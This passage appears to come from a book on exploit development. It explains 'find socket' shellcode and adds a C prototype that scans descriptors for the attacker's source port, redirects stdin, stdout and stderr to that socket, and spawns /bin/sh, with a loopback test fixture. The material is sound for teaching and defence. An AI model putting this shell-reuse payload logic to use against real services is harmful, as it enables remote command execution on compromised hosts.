This is made easier by the attacker's choice of a specific outbound (source)
port to bind to before initiating the connection to the vulnerable service. Because the attacker
chose that port, the shellcode knows exactly which remote port a valid socket descriptor must be
connected to, and determining the proper socket descriptor to duplicate becomes a matter
of locating the one descriptor whose peer is connected from the port known to have been
used by the attacker. The steps required by find socket shellcode include the following:
1. For each of the 256 possible file descriptors, determine if the descriptor
represents a valid network connection, and if so, is the remote port the one
known to have been used by the attacker. This port number is typically hardcoded
into the shellcode.
2. Once the desired socket descriptor has been located, duplicate the socket onto
stdin, stdout, and stderr.
3. Spawn a new command shell process (which will receive/send its input/output
over the original socket).
One complication that must be taken into account is that the find socket shellcode must
know from what port the attacker's connection has originated. In cases where the
attacker's connection must pass through a NAT device, the attacker may not be able to
control the source port that the NATing device rewrites the connection to use. Step 1 then
fails, because the port number hardcoded into the shellcode does not match the port the
vulnerable service actually sees on the connected socket.
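The three steps above, and the NAT failure mode, carried through in C as an added example (this is not code from the book; it is the C prototype one would write before hand-assembling the shellcode). It scans descriptors 0 through 255 with getpeername(), picks the socket whose peer port matches the hardcoded attacker port, and shows the dup2()/execve() tail. To run offline it builds a loopback TCP connection inside one process (make_loopback, a constructed test fixture, not something the shellcode would contain) and lets the kernel pick the client's source port; a real attacker would instead bind() to a port of their choosing. The names find_socket, dup_and_spawn, make_loopback and struct loopback are assumptions for this example.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define MAX_FD 256  /* the shellcode's scan range: descriptors 0..255 */

/* Step 1: find the connected TCP socket whose peer port equals the
 * port the attacker hardcoded. Returns the descriptor, or -1 if none.
 * getpeername() fails (EBADF/ENOTSOCK/ENOTCONN) for closed descriptors,
 * pipes, files and unconnected sockets, so those are skipped. */
int find_socket(unsigned short attacker_port) {
    for (int fd = 0; fd < MAX_FD; fd++) {
        struct sockaddr_in peer;
        socklen_t len = sizeof(peer);
        memset(&peer, 0, sizeof(peer));
        if (getpeername(fd, (struct sockaddr *)&peer, &len) != 0)
            continue;
        if (peer.sin_family != AF_INET)
            continue;
        if (ntohs(peer.sin_port) == attacker_port)
            return fd;
    }
    return -1;  /* e.g. a NAT rewrote the source port: nothing matches */
}

/* Steps 2 and 3: point stdin/stdout/stderr at the socket and spawn a
 * shell. Only returns (with -1) if dup2() or execve() fails. */
int dup_and_spawn(int sock) {
    if (dup2(sock, 0) < 0 || dup2(sock, 1) < 0 || dup2(sock, 2) < 0)
        return -1;
    char *argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL);
    return -1;
}

/* Constructed fixture (not part of the shellcode): a listener, a client
 * and the accepted server-side socket, all on 127.0.0.1 in this process.
 * client_port plays the role of the attacker's chosen source port. */
struct loopback {
    int listener, client, accepted;
    unsigned short client_port;
};

int make_loopback(struct loopback *lb) {
    struct sockaddr_in addr;
    socklen_t len = sizeof(addr);

    lb->listener = socket(AF_INET, SOCK_STREAM, 0);
    if (lb->listener < 0) return -1;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr.sin_port = 0;  /* kernel picks a free listening port */
    if (bind(lb->listener, (struct sockaddr *)&addr, sizeof(addr)) < 0) return -1;
    if (listen(lb->listener, 1) < 0) return -1;
    if (getsockname(lb->listener, (struct sockaddr *)&addr, &len) < 0) return -1;

    lb->client = socket(AF_INET, SOCK_STREAM, 0);
    if (lb->client < 0) return -1;
    /* A real attacker would bind() the client to a known port here. */
    if (connect(lb->client, (struct sockaddr *)&addr, sizeof(addr)) < 0) return -1;

    lb->accepted = accept(lb->listener, NULL, NULL);
    if (lb->accepted < 0) return -1;

    /* Learn the source port the kernel chose, as the attacker would know it. */
    len = sizeof(addr);
    if (getsockname(lb->client, (struct sockaddr *)&addr, &len) < 0) return -1;
    lb->client_port = ntohs(addr.sin_port);
    return 0;
}

int main(void) {
    struct loopback lb;
    if (make_loopback(&lb) != 0) {
        perror("make_loopback");
        return 1;
    }
    int fd = find_socket(lb.client_port);
    printf("peer port %u -> descriptor %d (accepted socket is %d)\n",
           lb.client_port, fd, lb.accepted);
    /* The NAT case: the hardcoded port no longer matches any peer. */
    printf("scan for a rewritten port: %d\n", find_socket(1));
    /* Real shellcode would now call dup_and_spawn(fd); omitted here so the
     * demonstration process is not replaced by a shell. */
    return fd == lb.accepted ? 0 : 1;
}
```

The scan matches on the peer's port only, so the client socket in the same process is not mistaken for the target (its peer is the listener's port, not the client port). A descriptor scan like this is also why the technique survives the service having other open sockets: the attacker-chosen port is the discriminator, and when NAT changes it the search comes back empty.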